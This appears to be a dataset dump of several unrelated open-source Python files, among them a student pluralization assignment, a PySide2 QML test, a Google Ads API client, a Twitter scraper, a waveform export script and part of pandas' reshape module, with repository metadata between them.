parser.error('Please specify a valid input file')
results, keys = parse(options)
generate_csv(results, keys, options)
return None
if __name__ == "__main__" :
main() | gpl-3.0 | 7,071,415,867,654,911,000 | 35.04 | 165 | 0.595465 | false |
s5brown/MLfeatures | assignment_1_Sebastian_Brown.py | 1 | 3964 | """Assignment 1."""
from assignment_1_eval import pairs
vowels = ['a', 'e', 'i', 'o', 'u']
es_sounds = ['ch', 's', 'z']
no_change = [
'economics', 'mathematics', 'statistics', 'luggage',
'baggage', 'furniture', 'information', 'gymnastics', 'news']
always_singular = ['fish', 'barracks', 'deer', 'sheep']
def pluralize(sg):
"""Return list of plural form(s) of input_word.
Building this function is the purpose of Assignment 1.
The most basic case is already provided.
"""
# print('Enter word to be made plural: ')
plurals = []
if sg in no_change:
plurals.append('')
elif sg in always_singular:
plurals.append(sg)
elif sg == 'tooth':
plurals.append('teeth')
elif sg == 'goose':
plurals.append('geese')
elif sg == 'child':
plurals.append('children')
elif sg == 'foot':
plurals.append('feet')
elif sg == 'man':
plurals.append('men')
elif sg == 'woman':
plurals.append('women')
elif sg == 'person':
plurals.append('people')
elif sg == 'mouse':
plurals.append('mice')
elif sg == 'corpus':
plurals.append(sg.replace(sg[-2:], 'ora'))
elif sg == 'genus':
plurals.append(sg.replace(sg[-2:], 'era'))
elif sg.endswith('a'):
plurals.append(sg + 'e')
plurals.append(sg + 's')
elif sg == 'crisis':
plurals.append('crises')
elif sg.endswith('us'):
plurals.append(sg.replace(sg[-2:], 'i'))
plurals.append(sg + 'es')
elif sg.endswith('ex'):
plurals.append(sg.replace(sg[-2:], 'ices'))
plurals.append(sg + 'es')
elif sg.endswith('x'):
plurals.append(sg.replace(sg[-1], 'ces'))
plurals.append(sg + 'es')
elif sg.endswith('um'):
plurals.append(sg.replace(sg[-2:], 'a'))
plurals.append(sg + 's')
elif sg.endswith('on'):
plurals.append(sg.replace(sg[-2:], 'a'))
elif sg.endswith('is'):
plurals.append(sg.replace(sg[-2:], 'es'))
elif sg.endswith('oo'):
plurals.append(sg + 's')
elif sg.endswith('o') and sg != 'auto':
plurals.append(sg + 'es')
plurals.append(sg + 's')
elif sg.endswith('y') and sg[-2] in vowels:
plurals.append(sg + 's')
elif sg.endswith('y'):
plurals.append(sg.replace(sg[-1], 'ies'))
# NOTE I had to add parentheses to the following two lines to make the interpreter keep reading the next line.
elif (sg.endswith(es_sounds[0]) or sg.endswith(es_sounds[1])
or sg.endswith(es_sounds[2])):
plurals.append(sg + 'es')
elif sg.endswith('f'):
plurals.append(sg.replace(sg[-1], 'ves'))
elif sg.endswith('fe'):
plurals.append(sg.replace(sg[-2:], 'ves'))
else:
plurals.append(sg + 's')
return plurals
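# Added illustrative sketch (not part of the assignment solution): a few expected
# outputs based on the rules implemented above.
def _demo_pluralize():
    assert pluralize('city') == ['cities']
    assert pluralize('goose') == ['geese']
    assert pluralize('church') == ['churches']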
def singularize(sg):
"""Return list of plural form(s) of input_word.
Building this function is the purpose of Assignment 1.
The most basic case is already provided.
"""
# print("Enter word to be made singular: ")
plurals = []
return plurals
def evaluate(pl_func=pluralize, pair_data=pairs):
"""Evaluate the performance of pluralize function based on pairs data.
pl_func -- function that pluralizes input word (default=pluralize)
pair_data -- list of 2-tuples: [(sg1, pl1), (sg2, pl2),...] (default=pairs)
"""
total = len(pair_data)
# Determine how many lexemes have more than one plural form.
# duplicates = len(set([i for i, j in pair_data]))
correct = 0
for sg, pl in pair_data:
predicted_pl = pl_func(sg)
if pl == predicted_pl or pl in predicted_pl:
correct += 1
print('correct:', sg, predicted_pl, '({})'.format(pl), sep='\t')
else:
print('INcorrect:', sg, predicted_pl, '({})'.format(pl), sep='\t')
print('Your score:', correct, '/', total, '{:.2%}'.format(correct / total))
evaluate()
| gpl-3.0 | -5,668,059,858,905,396,000 | 31.760331 | 114 | 0.573411 | false |
qtproject/pyside-pyside | tests/QtQml/registertype.py | 1 | 3725 | #############################################################################
##
## Copyright (C) 2016 The Qt Company Ltd.
## Contact: https://www.qt.io/licensing/
##
## This file is part of the test suite of PySide2.
##
## $QT_BEGIN_LICENSE:GPL-EXCEPT$
## Commercial License Usage
## Licensees holding valid commercial Qt licenses may use this file in
## accordance with the commercial license agreement provided with the
## Software or, alternatively, in accordance with the terms contained in
## a written agreement between you and The Qt Company. For licensing terms
## and conditions see https://www.qt.io/terms-conditions. For further
## information use the contact form at https://www.qt.io/contact-us.
##
## GNU General Public License Usage
## Alternatively, this file may be used under the terms of the GNU
## General Public License version 3 as published by the Free Software
## Foundation with exceptions as appearing in the file LICENSE.GPL3-EXCEPT
## included in the packaging of this file. Please review the following
## information to ensure the GNU General Public License requirements will
## be met: https://www.gnu.org/licenses/gpl-3.0.html.
##
## $QT_END_LICENSE$
##
#############################################################################
import sys
import unittest
import helper
from PySide2.QtCore import Property, QTimer, QUrl
from PySide2.QtGui import QGuiApplication, QPen, QColor, QPainter
from PySide2.QtQml import qmlRegisterType, ListProperty
from PySide2.QtQuick import QQuickView, QQuickItem, QQuickPaintedItem
class PieSlice (QQuickPaintedItem):
def __init__(self, parent = None):
QQuickPaintedItem.__init__(self, parent)
self._color = QColor()
self._fromAngle = 0
self._angleSpan = 0
def getColor(self):
return self._color
def setColor(self, value):
self._color = value
def getFromAngle(self):
        return self._fromAngle
def setFromAngle(self, value):
self._fromAngle = value
def getAngleSpan(self):
return self._angleSpan
def setAngleSpan(self, value):
self._angleSpan = value
color = Property(QColor, getColor, setColor)
fromAngle = Property(int, getFromAngle, setFromAngle)
angleSpan = Property(int, getAngleSpan, setAngleSpan)
def paint(self, painter):
global paintCalled
pen = QPen(self._color, 2)
painter.setPen(pen);
painter.setRenderHints(QPainter.Antialiasing, True);
painter.drawPie(self.boundingRect(), self._fromAngle * 16, self._angleSpan * 16);
paintCalled = True
class PieChart (QQuickItem):
def __init__(self, parent = None):
QQuickItem.__init__(self, parent)
self._name = ''
self._slices = []
def getName(self):
return self._name
def setName(self, value):
self._name = value
name = Property(str, getName, setName)
def appendSlice(self, _slice):
global appendCalled
_slice.setParentItem(self)
self._slices.append(_slice)
appendCalled = True
slices = ListProperty(PieSlice, append=appendSlice)
appendCalled = False
paintCalled = False
class TestQmlSupport(unittest.TestCase):
def testIt(self):
app = QGuiApplication([])
qmlRegisterType(PieChart, 'Charts', 1, 0, 'PieChart');
qmlRegisterType(PieSlice, "Charts", 1, 0, "PieSlice");
view = QQuickView()
view.setSource(QUrl.fromLocalFile(helper.adjust_filename('registertype.qml', __file__)))
view.show()
QTimer.singleShot(250, view.close)
app.exec_()
self.assertTrue(appendCalled)
self.assertTrue(paintCalled)
if __name__ == '__main__':
unittest.main()
| lgpl-2.1 | 2,296,957,859,559,989,800 | 30.567797 | 96 | 0.651812 | false |
vmarkovtsev/django-apiblueprint-tests | __main__.py | 1 | 2997 | # -*- coding: utf-8 -*-
"""
Django REST framework tests generator which is based on API Blueprint
(https://apiblueprint.org/) documents.
Released under New BSD License.
Copyright © 2015, Vadim Markovtsev :: AO InvestGroup
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of the AO InvestGroup nor the
names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL VADIM MARKOVTSEV BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import argparse
import os
from .generator import TestsGenerator
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--template", help="Jinja2 template to use",
default=os.path.abspath(os.path.join(
os.path.dirname(__file__), "tests.jinja2")))
parser.add_argument("-b", "--base-class",
help="Fully qualified base class for tests")
parser.add_argument("-c", "--no-comments", action="store_true",
help="Do not add docstrings to classes and methods")
parser.add_argument("-o", "--output", help="Output Python file with tests")
parser.add_argument("--disable-html2text", action="store_true",
help="Do not use html2text to convert descriptions "
"(otherwise it makes this program licensed under "
"GPLv3!)")
parser.add_argument("input", nargs='+', help="Input APIBlueprint files")
args = parser.parse_args()
generator = TestsGenerator(
args.template, include_comments=not args.no_comments,
base_class=args.base_class, html2text=not args.disable_html2text,
*args.input)
generator.generate(args.output)
if __name__ == "__main__":
main()
| bsd-3-clause | -5,848,360,594,570,658,000 | 48.114754 | 79 | 0.70227 | false |
googleapis/googleapis-gen | google/ads/googleads/v8/googleads-py/google/ads/googleads/v8/services/services/campaign_simulation_service/client.py | 1 | 19104 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
from distutils import util
import os
import re
from typing import Callable, Dict, Optional, Sequence, Tuple, Type, Union
import pkg_resources
from google.api_core import client_options as client_options_lib # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError # type: ignore
from google.oauth2 import service_account # type: ignore
from google.ads.googleads.v8.common.types import simulation
from google.ads.googleads.v8.enums.types import simulation_modification_method
from google.ads.googleads.v8.enums.types import simulation_type
from google.ads.googleads.v8.resources.types import campaign_simulation
from google.ads.googleads.v8.services.types import campaign_simulation_service
from .transports.base import CampaignSimulationServiceTransport, DEFAULT_CLIENT_INFO
from .transports.grpc import CampaignSimulationServiceGrpcTransport
class CampaignSimulationServiceClientMeta(type):
"""Metaclass for the CampaignSimulationService client.
This provides class-level methods for building and retrieving
support objects (e.g. transport) without polluting the client instance
objects.
"""
_transport_registry = OrderedDict() # type: Dict[str, Type[CampaignSimulationServiceTransport]]
_transport_registry['grpc'] = CampaignSimulationServiceGrpcTransport
def get_transport_class(cls,
label: str = None,
) -> Type[CampaignSimulationServiceTransport]:
"""Return an appropriate transport class.
Args:
label: The name of the desired transport. If none is
provided, then the first transport in the registry is used.
Returns:
The transport class to use.
"""
# If a specific transport is requested, return that one.
if label:
return cls._transport_registry[label]
# No transport is requested; return the default (that is, the first one
# in the dictionary).
return next(iter(cls._transport_registry.values()))
class CampaignSimulationServiceClient(metaclass=CampaignSimulationServiceClientMeta):
"""Service to fetch campaign simulations."""
@staticmethod
def _get_default_mtls_endpoint(api_endpoint):
"""Convert api endpoint to mTLS endpoint.
Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
"*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.
Args:
api_endpoint (Optional[str]): the api endpoint to convert.
Returns:
str: converted mTLS api endpoint.
"""
if not api_endpoint:
return api_endpoint
mtls_endpoint_re = re.compile(
r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
)
m = mtls_endpoint_re.match(api_endpoint)
name, mtls, sandbox, googledomain = m.groups()
if mtls or not googledomain:
return api_endpoint
if sandbox:
return api_endpoint.replace(
"sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
)
return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
DEFAULT_ENDPOINT = 'googleads.googleapis.com'
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
CampaignSimulationServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(info)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
CampaignSimulationServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(
filename)
kwargs['credentials'] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@property
def transport(self) -> CampaignSimulationServiceTransport:
"""Return the transport used by the client instance.
Returns:
CampaignSimulationServiceTransport: The transport used by the client instance.
"""
return self._transport
@staticmethod
def campaign_simulation_path(customer_id: str,campaign_id: str,type: str,modification_method: str,start_date: str,end_date: str,) -> str:
"""Return a fully-qualified campaign_simulation string."""
return "customers/{customer_id}/campaignSimulations/{campaign_id}~{type}~{modification_method}~{start_date}~{end_date}".format(customer_id=customer_id, campaign_id=campaign_id, type=type, modification_method=modification_method, start_date=start_date, end_date=end_date, )
@staticmethod
def parse_campaign_simulation_path(path: str) -> Dict[str,str]:
"""Parse a campaign_simulation path into its component segments."""
m = re.match(r"^customers/(?P<customer_id>.+?)/campaignSimulations/(?P<campaign_id>.+?)~(?P<type>.+?)~(?P<modification_method>.+?)~(?P<start_date>.+?)~(?P<end_date>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_billing_account_path(billing_account: str, ) -> str:
"""Return a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(billing_account=billing_account, )
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str,str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(folder: str, ) -> str:
"""Return a fully-qualified folder string."""
return "folders/{folder}".format(folder=folder, )
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str,str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(organization: str, ) -> str:
"""Return a fully-qualified organization string."""
return "organizations/{organization}".format(organization=organization, )
@staticmethod
def parse_common_organization_path(path: str) -> Dict[str,str]:
"""Parse a organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(project: str, ) -> str:
"""Return a fully-qualified project string."""
return "projects/{project}".format(project=project, )
@staticmethod
def parse_common_project_path(path: str) -> Dict[str,str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(project: str, location: str, ) -> str:
"""Return a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(project=project, location=location, )
@staticmethod
def parse_common_location_path(path: str) -> Dict[str,str]:
"""Parse a location path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path)
return m.groupdict() if m else {}
def __init__(self, *,
credentials: Optional[ga_credentials.Credentials] = None,
transport: Union[str, CampaignSimulationServiceTransport, None] = None,
client_options: Optional[client_options_lib.ClientOptions] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiate the campaign simulation service client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, ~.CampaignSimulationServiceTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. It won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
if isinstance(client_options, dict):
client_options = client_options_lib.from_dict(client_options)
if client_options is None:
client_options = client_options_lib.ClientOptions()
# Create SSL credentials for mutual TLS if needed.
use_client_cert = bool(util.strtobool(os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false")))
ssl_credentials = None
is_mtls = False
if use_client_cert:
if client_options.client_cert_source:
import grpc # type: ignore
cert, key = client_options.client_cert_source()
ssl_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
is_mtls = True
else:
creds = SslCredentials()
is_mtls = creds.is_mtls
ssl_credentials = creds.ssl_credentials if is_mtls else None
# Figure out which api endpoint to use.
if client_options.api_endpoint is not None:
api_endpoint = client_options.api_endpoint
else:
use_mtls_env = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto")
if use_mtls_env == "never":
api_endpoint = self.DEFAULT_ENDPOINT
elif use_mtls_env == "always":
api_endpoint = self.DEFAULT_MTLS_ENDPOINT
elif use_mtls_env == "auto":
api_endpoint = self.DEFAULT_MTLS_ENDPOINT if is_mtls else self.DEFAULT_ENDPOINT
else:
raise MutualTLSChannelError(
"Unsupported GOOGLE_API_USE_MTLS_ENDPOINT value. Accepted values: never, auto, always"
)
# Save or instantiate the transport.
# Ordinarily, we provide the transport, but allowing a custom transport
# instance provides an extensibility point for unusual situations.
if isinstance(transport, CampaignSimulationServiceTransport):
# transport is a CampaignSimulationServiceTransport instance.
if credentials:
raise ValueError('When providing a transport instance, '
'provide its credentials directly.')
self._transport = transport
elif isinstance(transport, str):
Transport = type(self).get_transport_class(transport)
self._transport = Transport(
credentials=credentials, host=self.DEFAULT_ENDPOINT
)
else:
self._transport = CampaignSimulationServiceGrpcTransport(
credentials=credentials,
host=api_endpoint,
ssl_channel_credentials=ssl_credentials,
client_info=client_info,
)
def get_campaign_simulation(self,
request: campaign_simulation_service.GetCampaignSimulationRequest = None,
*,
resource_name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> campaign_simulation.CampaignSimulation:
r"""Returns the requested campaign simulation in full
detail.
Args:
request (:class:`google.ads.googleads.v8.services.types.GetCampaignSimulationRequest`):
The request object. Request message for
[CampaignSimulationService.GetCampaignSimulation][google.ads.googleads.v8.services.CampaignSimulationService.GetCampaignSimulation].
resource_name (:class:`str`):
Required. The resource name of the
campaign simulation to fetch.
This corresponds to the ``resource_name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.ads.googleads.v8.resources.types.CampaignSimulation:
A campaign simulation. Supported combinations of advertising
channel type, simulation type and simulation
modification method is detailed below respectively.
SEARCH - CPC_BID - UNIFORM SEARCH - CPC_BID - SCALING
SEARCH - TARGET_CPA - UNIFORM SEARCH - TARGET_CPA -
SCALING SEARCH - TARGET_ROAS - UNIFORM SEARCH -
TARGET_IMPRESSION_SHARE - UNIFORM SEARCH - BUDGET -
UNIFORM SHOPPING - BUDGET - UNIFORM SHOPPING -
TARGET_ROAS - UNIFORM MULTIPLE - TARGET_CPA - UNIFORM
OWNED_AND_OPERATED - TARGET_CPA - DEFAULT DISPLAY -
TARGET_CPA - UNIFORM
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
if request is not None and any([resource_name]):
raise ValueError('If the `request` argument is set, then none of '
'the individual field arguments should be set.')
# Minor optimization to avoid making a copy if the user passes
# in a campaign_simulation_service.GetCampaignSimulationRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, campaign_simulation_service.GetCampaignSimulationRequest):
request = campaign_simulation_service.GetCampaignSimulationRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if resource_name is not None:
request.resource_name = resource_name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get_campaign_simulation]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((
('resource_name', request.resource_name),
)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
__all__ = (
'CampaignSimulationServiceClient',
)
| apache-2.0 | -7,526,720,101,945,983,000 | 45.144928 | 280 | 0.63505 | false |
bmd/twittrscrapr | twittrscrapr/scrapers/timelinescrapr.py | 1 | 1459 | import logging
from ..parsers import DictParser
from base_scraper import TwittrScrapr
log = logging.getLogger('scrapers.TimelineScrapr')
class TimelineScrapr(TwittrScrapr):
def __init__(self, api_keys, writer):
super(TimelineScrapr, self).__init__(api_keys, writer)
def _fetch_user_timeline(self, user):
finished_pagination = False
new_max = None
results = []
parser = DictParser()
while not finished_pagination:
self.check_rate_limit()
call_result = self.api.get_user_timeline(screen_name=user, count=200, include_rts=1, trim_user=True,
max_id=new_max)
if len(call_result) > 0:
results.extend([parser.parse(t, user=user) for t in call_result])
new_max = str(int(call_result[-1]['id_str']) - 1)
else:
finished_pagination = True
self.reset_time = self.api.get_lastfunction_header('x-rate-limit-reset')
self.calls_remaining = self.api.get_lastfunction_header('x-rate-limit-remaining')
return results
@TwittrScrapr.error_handler
def fetch_user_statuses(self, writer):
for user in self.scrape_queue:
log.info('Fetching tweets for {}'.format(user))
res = self._fetch_user_timeline(user)
log.info('Got {} tweets'.format(len(res)))
writer.writerows(res)
| mit | -2,145,231,821,339,842,000 | 33.738095 | 112 | 0.592872 | false |
astroclark/BayesSpec | waveforms/waveforms2hdf5.py | 1 | 1186 | #!/usr/bin/env python
"""
waveforms2hdf5.py loops over the list of waveforms defined in this script and
dumps out an hdf5 file for the plus polarisation. The idea is to then compute
the Shannon entropy of the waveforms using Matlab's wentropy.m function.
"""
import h5py
import numpy as np
import pmns_utils
wfs='/Users/jclark/hmns_repo/results/penultimate_waveforms.txt'
waveform_list=np.loadtxt(wfs,dtype=str)
#waveform_list=['shen_135135_lessvisc','apr_135135']
h5_file=h5py.File('waveforms.hdf5','w')
h5_snr_file=h5py.File('snr.hdf5','w')
for waveform in waveform_list:
# Generate waveform instance
wf=pmns_utils.Waveform(waveform)
# Compute the time series & SNR
wf.make_wf_timeseries()
wf.compute_characteristics()
# Zoom in on signal
peak_idx=np.argmax(wf.hplus.data.data)
wf_start_idx=np.argwhere(abs(wf.hplus.data.data)>0)[0]
wf_end_idx=np.argwhere(abs(wf.hplus.data.data)>0)[-1]
wf_reduced = wf.hplus.data.data[wf_start_idx:wf_end_idx]
h5_file[waveform] = wf_reduced
h5_snr_file[waveform] = wf.snr_plus
#h5_file[waveform]=wf_reduced
#h5_file[waveform+'_snr']=wf.snr_plus
h5_file.close()
h5_snr_file.close()
| gpl-2.0 | -5,496,950,762,767,886,000 | 29.410256 | 78 | 0.713322 | false |
Ziqi-Li/bknqgis | pandas/pandas/core/reshape/reshape.py | 1 | 45812 | # pylint: disable=E1101,E1103
# pylint: disable=W0703,W0622,W0613,W0201
from pandas.compat import range, zip
from pandas import compat
import itertools
import re
import numpy as np
from pandas.core.dtypes.common import (
_ensure_platform_int,
is_list_like, is_bool_dtype,
needs_i8_conversion)
from pandas.core.dtypes.cast import maybe_promote
from pandas.core.dtypes.missing import notna
import pandas.core.dtypes.concat as _concat
from pandas.core.series import Series
from pandas.core.frame import DataFrame
from pandas.core.sparse.api import SparseDataFrame, SparseSeries
from pandas.core.sparse.array import SparseArray
from pandas._libs.sparse import IntIndex
from pandas.core.categorical import Categorical, _factorize_from_iterable
from pandas.core.sorting import (get_group_index, get_compressed_ids,
compress_group_index, decons_obs_group_ids)
import pandas.core.algorithms as algos
from pandas._libs import algos as _algos, reshape as _reshape
from pandas.core.frame import _shared_docs
from pandas.util._decorators import Appender
from pandas.core.index import MultiIndex, _get_na_value
class _Unstacker(object):
"""
Helper class to unstack data / pivot with multi-level index
Parameters
----------
level : int or str, default last level
Level to "unstack". Accepts a name for the level.
Examples
--------
>>> import pandas as pd
>>> index = pd.MultiIndex.from_tuples([('one', 'a'), ('one', 'b'),
... ('two', 'a'), ('two', 'b')])
>>> s = pd.Series(np.arange(1, 5, dtype=np.int64), index=index)
>>> s
one a 1
b 2
two a 3
b 4
dtype: int64
>>> s.unstack(level=-1)
a b
one 1 2
two 3 4
>>> s.unstack(level=0)
one two
a 1 3
b 2 4
Returns
-------
unstacked : DataFrame
"""
def __init__(self, values, index, level=-1, value_columns=None,
fill_value=None):
self.is_categorical = None
if values.ndim == 1:
if isinstance(values, Categorical):
self.is_categorical = values
values = np.array(values)
values = values[:, np.newaxis]
self.values = values
self.value_columns = value_columns
self.fill_value = fill_value
if value_columns is None and values.shape[1] != 1: # pragma: no cover
raise ValueError('must pass column labels for multi-column data')
self.index = index
if isinstance(self.index, MultiIndex):
if index._reference_duplicate_name(level):
msg = ("Ambiguous reference to {0}. The index "
"names are not unique.".format(level))
raise ValueError(msg)
self.level = self.index._get_level_number(level)
# when index includes `nan`, need to lift levels/strides by 1
self.lift = 1 if -1 in self.index.labels[self.level] else 0
self.new_index_levels = list(index.levels)
self.new_index_names = list(index.names)
self.removed_name = self.new_index_names.pop(self.level)
self.removed_level = self.new_index_levels.pop(self.level)
self._make_sorted_values_labels()
self._make_selectors()
def _make_sorted_values_labels(self):
v = self.level
labs = list(self.index.labels)
levs = list(self.index.levels)
to_sort = labs[:v] + labs[v + 1:] + [labs[v]]
sizes = [len(x) for x in levs[:v] + levs[v + 1:] + [levs[v]]]
comp_index, obs_ids = get_compressed_ids(to_sort, sizes)
ngroups = len(obs_ids)
indexer = _algos.groupsort_indexer(comp_index, ngroups)[0]
indexer = _ensure_platform_int(indexer)
self.sorted_values = algos.take_nd(self.values, indexer, axis=0)
self.sorted_labels = [l.take(indexer) for l in to_sort]
def _make_selectors(self):
new_levels = self.new_index_levels
# make the mask
remaining_labels = self.sorted_labels[:-1]
level_sizes = [len(x) for x in new_levels]
comp_index, obs_ids = get_compressed_ids(remaining_labels, level_sizes)
ngroups = len(obs_ids)
comp_index = _ensure_platform_int(comp_index)
stride = self.index.levshape[self.level] + self.lift
self.full_shape = ngroups, stride
selector = self.sorted_labels[-1] + stride * comp_index + self.lift
mask = np.zeros(np.prod(self.full_shape), dtype=bool)
mask.put(selector, True)
if mask.sum() < len(self.index):
raise ValueError('Index contains duplicate entries, '
'cannot reshape')
self.group_index = comp_index
self.mask = mask
self.unique_groups = obs_ids
self.compressor = comp_index.searchsorted(np.arange(ngroups))
def get_result(self):
# TODO: find a better way than this masking business
values, value_mask = self.get_new_values()
columns = self.get_new_columns()
index = self.get_new_index()
# filter out missing levels
if values.shape[1] > 0:
col_inds, obs_ids = compress_group_index(self.sorted_labels[-1])
# rare case, level values not observed
if len(obs_ids) < self.full_shape[1]:
inds = (value_mask.sum(0) > 0).nonzero()[0]
values = algos.take_nd(values, inds, axis=1)
columns = columns[inds]
# may need to coerce categoricals here
if self.is_categorical is not None:
categories = self.is_categorical.categories
ordered = self.is_categorical.ordered
values = [Categorical(values[:, i], categories=categories,
ordered=ordered)
for i in range(values.shape[-1])]
return DataFrame(values, index=index, columns=columns)
def get_new_values(self):
values = self.values
# place the values
length, width = self.full_shape
stride = values.shape[1]
result_width = width * stride
result_shape = (length, result_width)
mask = self.mask
mask_all = mask.all()
# we can simply reshape if we don't have a mask
if mask_all and len(values):
new_values = (self.sorted_values
.reshape(length, width, stride)
.swapaxes(1, 2)
.reshape(result_shape)
)
new_mask = np.ones(result_shape, dtype=bool)
return new_values, new_mask
# if our mask is all True, then we can use our existing dtype
if mask_all:
dtype = values.dtype
new_values = np.empty(result_shape, dtype=dtype)
else:
dtype, fill_value = maybe_promote(values.dtype, self.fill_value)
new_values = np.empty(result_shape, dtype=dtype)
new_values.fill(fill_value)
new_mask = np.zeros(result_shape, dtype=bool)
name = np.dtype(dtype).name
sorted_values = self.sorted_values
# we need to convert to a basic dtype
# and possibly coerce an input to our output dtype
# e.g. ints -> floats
if needs_i8_conversion(values):
sorted_values = sorted_values.view('i8')
